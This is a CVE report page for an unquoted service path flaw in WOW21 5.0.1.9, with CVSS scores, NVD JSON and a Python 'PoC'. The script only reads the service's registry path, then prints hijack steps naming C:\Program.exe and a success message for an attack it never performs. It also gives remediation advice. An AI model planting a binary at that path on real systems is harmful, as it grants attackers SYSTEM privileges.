Security Vulnerability Report
CVE-2022-50921 CVSS 7.8 HIGH

CVE-2022-50921

Published: 2026-01-13 23:15:56
Last Modified: 2026-02-02 16:16:16

Description

WOW21 5.0.1.9 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with LocalSystem permissions during service startup.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wow21:wow21:5.0.1.9:*:*:*:*:*:*:* - VULNERABLE
WOW21 < 5.0.1.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
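# CVE-2022-50921 PoC - Unquoted Service Path Exploitation
# Target: WOW21 Service (wowservice.exe)
# Vulnerability: Unquoted service path in WOW21 5.0.1.9
#
# Defender notes:
#   * This script only reads the service's ImagePath and prints a walkthrough;
#     it writes no file and starts or stops no service.
#   * Remediation is to wrap the service ImagePath value in double quotes and
#     to make sure non-administrators cannot create files in C:\ or in any
#     parent directory of the service binary.
import os
import sys
import subprocess
import time


def image_path_is_unquoted(reg_output):
    """Decide whether `reg query ... /v ImagePath` output shows an unquoted path with a space.

    Args:
        reg_output: Text printed by `reg query` for the ImagePath value.

    Returns:
        True when the executable portion of ImagePath is not wrapped in double
        quotes and contains a space; False otherwise, including when no
        ImagePath line is present.
    """
    for line in reg_output.splitlines():
        # A value line reads "ImagePath    REG_EXPAND_SZ    <data>"; splitting at
        # most twice keeps the spaces inside <data> intact.
        fields = line.strip().split(None, 2)
        if len(fields) != 3:
            continue
        name, value_type, data = fields
        if name.lower() != "imagepath":
            continue
        if value_type.upper() not in ("REG_SZ", "REG_EXPAND_SZ"):
            continue
        data = data.strip()
        if data.startswith('"'):
            # The executable path is quoted, so it is parsed as one token.
            return False
        # Only the executable portion matters: spaces that follow ".exe" belong
        # to command-line arguments, not to the path.
        end = data.lower().find(".exe")
        executable = data if end == -1 else data[: end + 4]
        return " " in executable
    return False


def check_unquoted_path():
    """Check if WOW21 service has unquoted path vulnerability.

    Returns:
        True when the WOWService ImagePath is unquoted and contains a space,
        False when it is quoted, has no space, or cannot be read.
    """
    try:
        # Query registry for WOW21 service configuration. The raw string keeps
        # the registry backslashes literal without invalid escape sequences
        # such as "\S" or "\W".
        result = subprocess.run([
            'cmd.exe', '/c',
            r'reg query "HKLM\SYSTEM\CurrentControlSet\Services\WOWService" /v ImagePath'
        ], capture_output=True, text=True)
        if result.returncode != 0:
            # Service key or value is missing, or access was denied.
            print(f"[-] Error checking service: {result.stderr.strip()}")
            return False
        output = result.stdout
        print(f"[+] Service ImagePath: {output}")
        if image_path_is_unquoted(output):
            print("[!] VULNERABLE: Service path is unquoted!")
            return True
        return False
    except Exception as e:
        # cmd.exe is unavailable (non-Windows host) or the call failed.
        print(f"[-] Error checking service: {e}")
        return False


def create_malicious_executable():
    """Report the location an unquoted-path hijack would use; nothing is created.

    Returns:
        The path, as a string, that this walkthrough names as the hijack location.
    """
    # For an unquoted "C:\Program Files\..." path, Windows first tries the text
    # before the first space as an executable name, which resolves to
    # C:\Program.exe. An unexpected file at that location is therefore worth
    # alerting on.
    malicious_path = "C:\\Program.exe"
    print(f"[!] In real attack, malicious executable would be placed at: {malicious_path}")
    print("[!] When WOW21 service starts, it will execute this file with SYSTEM privileges")
    return malicious_path


def exploit():
    """Print the steps of the unquoted service path issue for the WOW21 service.

    The function stops early when check_unquoted_path() reports that the
    service is absent or its path is quoted. Steps 2-4 are descriptive output
    only: no file is written and no service is restarted.
    """
    print("=" * 60)
    print("CVE-2022-50921 - WOW21 Unquoted Service Path Exploit")
    print("=" * 60)
    if not check_unquoted_path():
        print("[-] Service not found or path is properly quoted")
        return
    # Step 1: Identify vulnerable service
    print("\n[Step 1] Identifying vulnerable service path...")
    # Hard-coded expected install path; it is not taken from the registry query.
    vulnerable_path = "C:\\Program Files\\WOW21\\wowservice.exe"
    print(f"[+] Vulnerable path: {vulnerable_path}")
    # Step 2: Create malicious executable
    print("\n[Step 2] Creating malicious executable...")
    mal_path = create_malicious_executable()
    # Step 3: Place malicious executable
    print(f"\n[Step 3] Malicious executable would be placed at: {mal_path}")
    print("[+] Wait for service restart or trigger service start")
    # Step 4: Gain SYSTEM privileges
    print("\n[Step 4] When service starts, malicious code executes with LocalSystem privileges")
    # NOTE: the next message describes the expected outcome of a real attack,
    # not something this script observed or performed.
    print("[+] Privilege Escalation Successful!")


if __name__ == "__main__":
    exploit()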

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50921", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:55.960", "lastModified": "2026-02-02T16:16:16.217", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "WOW21 5.0.1.9 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with LocalSystem permissions during service startup."}, {"lang": "es", "value": "WOW21 5.0.1.9 contiene una vulnerabilidad de ruta de servicio sin comillas que permite a atacantes locales ejecutar potencialmente código arbitrario con privilegios de sistema elevados. Los atacantes pueden explotar la ruta binaria sin comillas para inyectar ejecutables maliciosos que se iniciarán con permisos de LocalSystem durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": 
"NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wow21:wow21:5.0.1.9:*:*:*:*:*:*:*", "matchCriteriaId": "799F3446-D74F-4107-BACD-8A7530AECC4E"}]}]}], "references": [{"url": "https://web.archive.org/web/20220220170535/https://wow21.life/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50818", "source": "[email 
protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/wow-service-wowservice-unquoted-service-path", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50818", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}